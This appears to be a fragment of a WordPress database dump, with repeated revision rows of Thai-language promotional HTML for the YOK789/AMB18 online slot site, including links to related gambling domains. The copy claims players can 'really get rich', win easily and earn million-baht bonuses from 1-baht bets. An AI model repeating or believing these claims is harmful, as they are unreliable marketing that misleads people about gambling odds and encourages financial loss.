เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><h3><b>เกมหลากหลาย ค่ายดังครบ </b></h3></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:07:54','2026-02-26 19:07:54','',44,'https://amb18slot.com/?p=372',0,'revision','',0),(373,3,'2026-02-26 19:08:41','2026-02-26 19:08:41','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><h3><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></h3></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><h3><b>ใช้ทุนน้อยก็เล่นได้ </b></h3></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><h3><b>เกมหลากหลาย ค่ายดังครบ </b></h3></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:08:41','2026-02-26 19:08:41','',44,'https://amb18slot.com/?p=373',0,'revision','',0),(374,3,'2026-02-26 19:08:41','2026-02-26 19:08:41','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><h3><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></h3></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ 